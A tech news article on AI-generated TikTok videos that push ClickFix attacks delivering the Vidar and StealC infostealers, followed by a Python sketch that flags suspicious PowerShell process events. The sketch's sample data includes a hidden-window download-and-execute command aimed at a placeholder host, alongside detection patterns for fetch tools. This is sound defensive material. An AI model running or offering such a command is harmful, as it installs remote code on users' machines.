These AI-Generated TikTok Videos Are Tricking People Into Installing Malware



In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks.

The scheme, identified by Trend Micro and reported by Bleeping Computer, instructs users to execute commands to activate Windows and Microsoft Office or premium features in CapCut and Spotify. One video is captioned “Boost Your Spotify Experience Instantly — Here’s How!” and has nearly half a million views.

These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware.

TikTok’s engagement algorithm makes it easy for such malicious videos to spread. In the past, cybercriminals have used TikTok’s trending “Invisible Challenge” to spread WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of Elon Musk (and themes around SpaceX and Tesla) to scam users into paying “activation” deposits using Bitcoin.

How TikTok ClickFix attacks work

ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command with malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to “fix” the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too.

How to spot malicious TikTok videos

Be wary of following instructional videos you’re served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with videos from legitimate sources, such as the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly. No malicious code is actually embedded in or delivered by these instructional videos. The scheme depends on social engineering via verbal directions, which makes the threat technically harder to detect.
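Because the videos carry no code, detection has to happen on the endpoint where the pasted command runs. As an added example (not from the article or the research it cites), the sketch below scores constructed Windows process-creation events for traits that a pasted ClickFix PowerShell command tends to combine; the event field names, the heuristics, the threshold and every sample value are assumptions.

```python
import re

# Assumed heuristics (not from the article): a pasted ClickFix command tends to
# combine several of these traits, while each one alone is common in benign use.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget|downloadstring)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HIDE = re.compile(r"(?<![\w-])-w\w*\s+h(?:idden)?\b", re.I)  # -w / -WindowStyle hidden
SHELLS = {"powershell.exe", "pwsh.exe"}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events with hypothetical field names; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": EXPLORER, "image": PS,
     "cmdline": 'powershell -w hidden -c "iex (irm https://host.example.invalid/placeholder)"'},
    {"parent": EXPLORER, "image": PS, "cmdline": "powershell.exe"},
    {"parent": r"C:\Program Files\Editor\editor.exe", "image": PS,
     "cmdline": 'powershell.exe -NoProfile -Command "Get-ChildItem"'},
    {"parent": EXPLORER, "image": PS,
     "cmdline": "powershell Invoke-WebRequest https://host.example.invalid/tool.zip -OutFile tool.zip"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": r"powershell -w hidden -File C:\Scripts\inventory.ps1"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Return (score, reasons): one point per suspicious trait present."""
    if basename(ev["image"]) not in SHELLS:
        return 0, []
    checks = [
        (basename(ev["parent"]) == "explorer.exe", "launched by the interactive user"),
        (bool(FETCH.search(ev["cmdline"])), "fetches remote content"),
        (bool(EXEC.search(ev["cmdline"])), "executes text as code"),
        (bool(HIDE.search(ev["cmdline"])), "hides its window"),
    ]
    reasons = [why for hit, why in checks if hit]
    return len(reasons), reasons


def flag_clickfix(events, threshold=3):
    """Events whose combined traits meet the (assumed) alert threshold."""
    return [ev for ev in events if score_event(ev)[0] >= threshold]
```

Only the first sample event is flagged: a user-initiated download or a hidden scheduled script scores below the threshold on its own.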



© 2001-2025 Ziff Davis, LLC., A ZIFF DAVIS COMPANY. ALL RIGHTS RESERVED.
